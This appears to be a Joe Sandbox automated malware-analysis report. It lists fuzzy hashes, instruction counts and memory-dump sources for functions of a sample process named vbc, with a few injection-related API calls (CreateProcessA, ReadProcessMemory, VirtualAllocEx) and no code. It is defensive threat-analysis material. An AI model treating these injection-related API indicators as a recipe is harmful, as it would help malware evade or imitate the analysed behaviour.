Opcode ID: f7c1361c9b8e8f5483c048a669340db5b4690ad757ffdbb32f4fcec7dad8704f
Instruction ID: f38f4be057aed138c4dae3be58d3c798e3c3594139c16b4617541083fba317c5
Opcode Fuzzy Hash: f7c1361c9b8e8f5483c048a669340db5b4690ad757ffdbb32f4fcec7dad8704f
Instruction Fuzzy Hash: B5C2B234A11269CFD714DB64C894EDDB7B1BF8A304F1196EAD8096B360DB31AE86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003800C8 Relevance: 1.1, Instructions: 1145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f5021da2978f6c52bb699b0a0c880c59f31ec9cff7344a1ef7543c799a79e0
Instruction ID: f856c1c37631bedd1791a29ccea311536f6aff35d45a32db44f931c213b1d99a
Opcode Fuzzy Hash: a8f5021da2978f6c52bb699b0a0c880c59f31ec9cff7344a1ef7543c799a79e0
Instruction Fuzzy Hash: 02C2B234A10269CFD714DF64C894ADDB7B1BF8A304F1196EAD8096B360DB31AE86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00382790 Relevance: .8, Instructions: 831COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87a5480a28bf85af4bde4df0cb0de9a40800adec0cd78915f127c5fdd03ffff
Instruction ID: ffd9962d83248a8454ea9dcb735f92fdb69ed9a21fe6277341004d27af69b117
Opcode Fuzzy Hash: f87a5480a28bf85af4bde4df0cb0de9a40800adec0cd78915f127c5fdd03ffff
Instruction Fuzzy Hash: 3B82D771C05368CEEB29DF96C8583EDFAB9BB88705F1480E9D109A6291D7790AC9DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0038277B Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61bc4160d537e68ca7556d9e6e4936e5b789ecb3e9bffe7e056294303a03432d
Instruction ID: 745e669d515616cb9818846cb41a2a5f21b42742805111c91fea8d6181ea89d7
Opcode Fuzzy Hash: 61bc4160d537e68ca7556d9e6e4936e5b789ecb3e9bffe7e056294303a03432d
Instruction Fuzzy Hash: 0C32EAB1C05368CEEB29DF96C8583EDBAF5BB84745F1480E9C109A6691D7790BC9DF00

Uniqueness

Uniqueness Score: -1.00%

Function 00389108 Relevance: .2, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e22e5836abae5dc261d18aab7cd23cc4b6ae61590d3a5765ed1e5d912b91d1
Instruction ID: 93e17d9d6b1917ad59aa6ed9a0b479c39985dbab4ff52fac3f62c06b4ac587cb
Opcode Fuzzy Hash: 20e22e5836abae5dc261d18aab7cd23cc4b6ae61590d3a5765ed1e5d912b91d1
Instruction Fuzzy Hash: 40712F70D042498FD748EFBAE88169EBBF3EB89344F04C939D1049B669DB7059858F61

Uniqueness

Uniqueness Score: -1.00%

Function 00389118 Relevance: .2, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40386dab7fffcf3e8d5929cb9c1e74909d0f33b4bf3023be968c6da388180a00
Instruction ID: 2eaf177dd1ea77674eea92b355810c3fa0888a34798b30243618f94969ee1ce4
Opcode Fuzzy Hash: 40386dab7fffcf3e8d5929cb9c1e74909d0f33b4bf3023be968c6da388180a00
Instruction Fuzzy Hash: 3E612F70D042498FE748EFAAE88169EBBF3EBC9344F04C939D1049B768DB7059858F61

Uniqueness

Uniqueness Score: -1.00%

Function 00386638 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008051e528bdae879ee63d1af5550c141866b418a2585b7eaa4c83cccbaa0bb4
Instruction ID: 375ae2a169844df4713ad367e10ef2657c5920d826a3a39ff05112ff69a98335
Opcode Fuzzy Hash: 008051e528bdae879ee63d1af5550c141866b418a2585b7eaa4c83cccbaa0bb4
Instruction Fuzzy Hash: 5251B374E012199FCB04DFAAD5819AEFBF2BF88304F24C569E419A7355D730A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007083A8 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0070866F

Strings

|#a, xrefs: 007086F2
|#a, xrefs: 007087B7
|#a, xrefs: 007085C2

Memory Dump Source

Source File: 0000000A.00000002.966196641.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_700000_vbc.jbxd

Similarity

API ID: CreateProcess
String ID: |#a$|#a$|#a
API String ID: 963392458-4126420104
Opcode ID: 1c40071c004d1ea86348900e0229bdef2df2052527a729ad2e936df1130992b7
Instruction ID: 4a77d738dd68410bdcbd72699dff31236aaaaa04ed76de2312b7ac666dd33310
Opcode Fuzzy Hash: 1c40071c004d1ea86348900e0229bdef2df2052527a729ad2e936df1130992b7
Instruction Fuzzy Hash: 78C13870D00269CFCB60CFA4C841BEDBBB1BF49304F1496A9E959B7280DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00708100 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 007081B2

Memory Dump Source

Source File: 0000000A.00000002.966196641.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_700000_vbc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: aef59aaa1a2f06ddb27abe386ded95759d6a33c4ad9a3c9d23f5b7a8e5246e79
Instruction ID: c56cfb0415a8930ffc22a0800dc506d4938fbc3978cdd1f6e824179531e51523
Opcode Fuzzy Hash: aef59aaa1a2f06ddb27abe386ded95759d6a33c4ad9a3c9d23f5b7a8e5246e79
Instruction Fuzzy Hash: CE4198B5D042589FCF10CFA9D884AEEFBB1BF49314F20942AE814B7240DB79A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00707E08 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00707EB2

Memory Dump Source

Source File: 0000000A.00000002.966196641.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_700000_vbc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5367551d956bae3f1226aca6b247d34572d429f85e9ecf6fdb2bb8c9c5ac254a
Instruction ID: 625639c2fab81cebf17fc340236784bd9762d26e80e2a71d308fb371bc9bb7a2
Opcode Fuzzy Hash: 5367551d956bae3f1226aca6b247d34572d429f85e9ecf6fdb2bb8c9c5ac254a
Instruction Fuzzy Hash: 564199B4D042589BCF14CFA9D880ADEFBB1BF49314F20942AE814B7350D735A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 003824EF Relevance: 1.4, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\-9l, xrefs: 003825AD

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID: \-9l
API String ID: 0-3666483836
Opcode ID: 67195c0866cbd60a0e8919cde447d67395c054ac5e0858711e10dd8243104397
Instruction ID: 69143a70dd530440c3e185ac304dad301f717eec16bab413b7bfeeb9edef44ca
Opcode Fuzzy Hash: 67195c0866cbd60a0e8919cde447d67395c054ac5e0858711e10dd8243104397
Instruction Fuzzy Hash: 1C510374E002488FDB14DFA5C894AEEFBB2FF89300F248169D405AB7A4DB749945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00383E85 Relevance: 1.3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PS[p, xrefs: 00383E93

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID: PS[p
API String ID: 0-2381952500
Opcode ID: 91721e46231085ce4a92aab61c3120bfdbb7f8c74b0287ee135073931257dcd5
Instruction ID: 66ad4d2113b52510783a5a57f216842110b829ab7c40cc93e123e8d90120ba6e
Opcode Fuzzy Hash: 91721e46231085ce4a92aab61c3120bfdbb7f8c74b0287ee135073931257dcd5
Instruction Fuzzy Hash: AE218635B042409FC715EFB4C85576E7BE3AF89700F268469E5069B7A4CF70DD428B61

Uniqueness

Uniqueness Score: -1.00%

Function 0038B785 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb49c167c4ff6a5df39e0b1c5de80ac0ed6ff34698c4d2bdc4bc75bf25b6e993
Instruction ID: a4ac60220c694c3f6a635456149c88ca22053f5abfba4fe6cec8da9998d80905
Opcode Fuzzy Hash: eb49c167c4ff6a5df39e0b1c5de80ac0ed6ff34698c4d2bdc4bc75bf25b6e993
Instruction Fuzzy Hash: 2AF10871C05368CEDB26EF96C8583EDBAB9BB88745F2441EAD109A7691D7740BC8DF00

Uniqueness

Uniqueness Score: -1.00%

Function 00384309 Relevance: .3, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ccaa8d24598949f8d248fb1a5b7d5b8562d2893817041a964d2553c46254d6a
Instruction ID: 6c9e832b9a9f9f37a99c657d027785028716203d4b01d67fffb47d1d0a7b0705
Opcode Fuzzy Hash: 8ccaa8d24598949f8d248fb1a5b7d5b8562d2893817041a964d2553c46254d6a
Instruction Fuzzy Hash: 22B14D74E00216DFCB15EFA8D480AADB7B6FF89300F6685A5E415ABA50D734EC82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00384310 Relevance: .3, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a12996f7aba1ce4ab6b4ba2fdbb0f3f6a38d9bf282ba949045dff16bde7c5473
Instruction ID: 22c2660beb430c6df6c5d3926a97936d1928d958e2dcbc42fe9adc1b9f200e70
Opcode Fuzzy Hash: a12996f7aba1ce4ab6b4ba2fdbb0f3f6a38d9bf282ba949045dff16bde7c5473
Instruction Fuzzy Hash: 12B14B74E00216DFCB15EFA8D480AADB7B6FF89300F6685A5E415ABA50D734EC82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00385B78 Relevance: .2, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8419c66ab498b37afd89d0c0aa7978d6580ba21e97e2c5ec83300d98e5a88ac7
Instruction ID: 0eeedb6c929cb725c148f7fda2e99a33ce27272b9add0f90194d98c28ee38620
Opcode Fuzzy Hash: 8419c66ab498b37afd89d0c0aa7978d6580ba21e97e2c5ec83300d98e5a88ac7
Instruction Fuzzy Hash: 5B519330B04655DFDB06EFA4D845B7EBBB6AF88300F218075F506ABB84DB74C8428B52

Uniqueness

Uniqueness Score: -1.00%

Function 00384E38 Relevance: .2, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8847a78d4350445c37476f850aef29fe717e110f4e632f9e747e7d654df3ee
Instruction ID: e02e4cdf8725f3411c05f71e044760991eb8f02b5720aa829fcf761aec6e3155
Opcode Fuzzy Hash: 6e8847a78d4350445c37476f850aef29fe717e110f4e632f9e747e7d654df3ee
Instruction Fuzzy Hash: EB519F31A04A16CBC712EF68D8406BEB3F9FF48304F2585AAE526CBA95D334E941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00383B92 Relevance: .2, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f60e71576ceded624d22cb9ff009ce4747c420bf021d74e0d7c2a23544e7f32
Instruction ID: 809da1d3475fea9ffd561c1b93690a0078d669800962fe1c8be4622f679d10a8
Opcode Fuzzy Hash: 7f60e71576ceded624d22cb9ff009ce4747c420bf021d74e0d7c2a23544e7f32
Instruction Fuzzy Hash: B451A530B04344DBEB166BA4C856BBE76B2AF84B01F664065F502AFBD0CB749E85C752

Uniqueness

Uniqueness Score: -1.00%

Function 00383B60 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8157140542227ab3474a4d28bab44b7ea35f3a9384f378a20ca32abf0a7b39
Instruction ID: e8cefd7f123125bac78f4dc6d24fbfb6bc4fad74d4852a44956984ccf36b22e8
Opcode Fuzzy Hash: 4f8157140542227ab3474a4d28bab44b7ea35f3a9384f378a20ca32abf0a7b39
Instruction Fuzzy Hash: 8A419430B443809BE7156FA49C5AB7E35A2AF88F01F614069F503AEBD0DBB49E458752

Uniqueness

Uniqueness Score: -1.00%

Function 0038BD2B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c87711a198cd442f840795d4747627b4e9855fe80469c69611935634e919ac4
Instruction ID: c1ecd70d3d63f40c6b718a488ae1c94a2642864d0baf4b70409a4ea990771983
Opcode Fuzzy Hash: 8c87711a198cd442f840795d4747627b4e9855fe80469c69611935634e919ac4
Instruction Fuzzy Hash: 19511B75D05268CEEB26EF96C8583ECBAB8BB48B45F5044E9C149A7641DB740FC9DF00

Uniqueness

Uniqueness Score: -1.00%

Function 00384C90 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad1a637bef3e572c75d3056c66952b816698d4498167dd1b3ebd3a51fa68ab4
Instruction ID: ca169db35f29fd54a33e7264690dd39ac08baea9aec05511ef33bbf036d7da33
Opcode Fuzzy Hash: 5ad1a637bef3e572c75d3056c66952b816698d4498167dd1b3ebd3a51fa68ab4
Instruction Fuzzy Hash: 1641CC31904316DBCB42AFA9C8406AAB7F8FF44304F1585A7E826CBAA2D334D955C761

Uniqueness

Uniqueness Score: -1.00%

Function 00384118 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f412f4f888e824e9be1769971f15a5d6ca114edb79e355fe0b2f65703a583cd5
Instruction ID: e905db32afb6703cad13e2cd42dbc0d588a36ea643af4f7116b0d074c044565a
Opcode Fuzzy Hash: f412f4f888e824e9be1769971f15a5d6ca114edb79e355fe0b2f65703a583cd5
Instruction Fuzzy Hash: E7417834D08209DFCB14EFE0C8446AEB7B2EF41308F12C9AAD4155B764EB749A46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00386630 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfa1445b36e2b3197b201e866a57b73b219b363911cfb7a78e5c0467f043ba4f
Instruction ID: a524f43ae466aaba1ef69493096687d434cb9d44f5b474af818820d31fc23996
Opcode Fuzzy Hash: dfa1445b36e2b3197b201e866a57b73b219b363911cfb7a78e5c0467f043ba4f
Instruction Fuzzy Hash: 4931E574E016199FCB04DFAAD980AEEFBF2BF88300F14C569E419A7355D734A9458F90

Uniqueness

Uniqueness Score: -1.00%

Function 00380088 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8725b0e1d299e9cfe2f64d56256c96eb8e9a045bad7e7393f0dcd0a3ca9cca6f
Instruction ID: 880c2bd1ef75725c5ee25eaead8a9fcf2fb72d3c9255e3ce2924e8bc13d86ce0
Opcode Fuzzy Hash: 8725b0e1d299e9cfe2f64d56256c96eb8e9a045bad7e7393f0dcd0a3ca9cca6f
Instruction Fuzzy Hash: 83319C74E0010A9FCB09EFA4D540AEEB7B2EF88300F1184A9E91577390CB35AD45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 003804F8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe54730bb2e7e8f15a30bd4e7585872ae99c5c0074abe4955d332b008924646
Instruction ID: ee2d986e9ae6da7d215c3e54c64836efcdc6e5da1505b17791e39d91e8c00444
Opcode Fuzzy Hash: 5fe54730bb2e7e8f15a30bd4e7585872ae99c5c0074abe4955d332b008924646
Instruction Fuzzy Hash: 1F31CF74E042499FCB09EFA4D840AEEBBB2EF88300F1184A9D815773A0CB355E05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 003868B0 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2ccae730c11f94de80d6a5f77080f1bafcc95344a34b3ecb10a6c632135cfb4
Instruction ID: 0ee7a0a2d65adc82667d9343f6bcd22969f6479ee58be3308cb10c753518ebc2
Opcode Fuzzy Hash: f2ccae730c11f94de80d6a5f77080f1bafcc95344a34b3ecb10a6c632135cfb4
Instruction Fuzzy Hash: E221A071A083188FCF11EF68D8422AEBBF4FF45310F5545AAD40AEB681D3349941DB62

Uniqueness

Uniqueness Score: -1.00%

Function 001ED01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965678702.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ed000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49621174d5aaf2b4de63d4a76a9236449c4a4d7feca199874894ef2f2737c27f
Instruction ID: 1044a05426fba491be352c408b217a7f39291dabd025b4ab84a7024faa88b313
Opcode Fuzzy Hash: 49621174d5aaf2b4de63d4a76a9236449c4a4d7feca199874894ef2f2737c27f
Instruction Fuzzy Hash: 6021F575604684EFDB15DF24E884B1ABB65EB88318F38C569F8094B246C736D847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001ED1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965678702.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ed000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65dd0fa113c2f1d6a3f8b95c9cbc99cd74e1bf9cce6c9804da98dfed2bee772
Instruction ID: 3759504f68832f842512b8075c811be4c299d22ae44acd2c130fc614befd6274
Opcode Fuzzy Hash: e65dd0fa113c2f1d6a3f8b95c9cbc99cd74e1bf9cce6c9804da98dfed2bee772
Instruction Fuzzy Hash: B2212975504685EFDB05DF21E9C0B2ABBA5FB88318F30C56DEA094B246C336D846DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00386A00 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f915017ebd7f589d79500202c70a13dac10dfe97e514bb4c4eb2ebda46e6e9f
Instruction ID: cb543ac40989854cb487af6a9616db72eb7c414f32af5366b23f5d5ab3602430
Opcode Fuzzy Hash: 3f915017ebd7f589d79500202c70a13dac10dfe97e514bb4c4eb2ebda46e6e9f
Instruction Fuzzy Hash: A221A4B2A04354CBCF12AB68C8422BDB7B4FF16311F5585EBD45ADB691D334D805E712

Uniqueness

Uniqueness Score: -1.00%

Function 003867D8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c687ace55eb083c9aeb15042cdb85773280244c2418b21be2ae054e676f5f8d
Instruction ID: 0d2bb96484ee47af9eb499ffbb4fe42c6e44888e1e6fab2df054211d5b7749f7
Opcode Fuzzy Hash: 4c687ace55eb083c9aeb15042cdb85773280244c2418b21be2ae054e676f5f8d
Instruction Fuzzy Hash: 9311E330B04300EFE72A6B648C57B6E7297AB85700F66C4B9E50A4F6A4CF71DC414792

Uniqueness

Uniqueness Score: -1.00%

Function 001ED006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965678702.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ed000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be20ea1f0bf8325bd0d9d5ec9255673ac348bcffab1c428c832eb406bce67201
Instruction ID: 33f57ebdc7f45d688e7ece9e01351d4fa51739d68d16f373f5bd1a17c6882374
Opcode Fuzzy Hash: be20ea1f0bf8325bd0d9d5ec9255673ac348bcffab1c428c832eb406bce67201
Instruction Fuzzy Hash: B02180755097C08FCB02CF20D994715BF71EB46314F28C5EAD8498B667C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 003867C8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 899131cfc7b30e2e53cdd2fa54565f428b92d934e5cf617eb4d2af41f6b12b1f
Instruction ID: 9e9280f6e2d702695a53a5bc04f45a957fde0468a522a192f26ee735e217a668
Opcode Fuzzy Hash: 899131cfc7b30e2e53cdd2fa54565f428b92d934e5cf617eb4d2af41f6b12b1f
Instruction Fuzzy Hash: 3C11C230B49340DFE716AB548C57B6A7762AB81700F1A84FAE50A8FAE5CB71DC418782

Uniqueness

Uniqueness Score: -1.00%

Function 001ED1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965678702.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1ed000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4fb8ff374167374b7307723662c2f1a25cf829ef7f15f37dbec8f84c6ff04db
Instruction ID: bc61b1536f80b2bc7b3ad6ff1e5fa2043db99797eacb252c13c28d275a739701
Opcode Fuzzy Hash: c4fb8ff374167374b7307723662c2f1a25cf829ef7f15f37dbec8f84c6ff04db
Instruction Fuzzy Hash: F4119D79504680DFCB12CF20E5C4B19FFA1FB84314F24C6AED9494B656C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0038041F Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e49ff85be4f34f398188b25fd2e0ae4ec35fcfd78e77d087c0ad5787f8004a06
Instruction ID: d1fdbbb6a00753e816cf862ca4922f3dfa9f792f244e913363a4ff40479fa1a1
Opcode Fuzzy Hash: e49ff85be4f34f398188b25fd2e0ae4ec35fcfd78e77d087c0ad5787f8004a06
Instruction Fuzzy Hash: 49F0AF6194E2C48FC716EBB498665ADBF709F03204B1A06EE85C5A71E3DA250E04D712

Uniqueness

Uniqueness Score: -1.00%

Function 001DD1C1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965659311.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1dd000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1507a4408ab9619548067f178c98f1b090d7dba9a0b86583dcf9fc4dff6bb6
Instruction ID: 0764e832c822d9d38d07acbb626a0c8f79e3b9bab05fa6d6103325dcaa312261
Opcode Fuzzy Hash: 0c1507a4408ab9619548067f178c98f1b090d7dba9a0b86583dcf9fc4dff6bb6
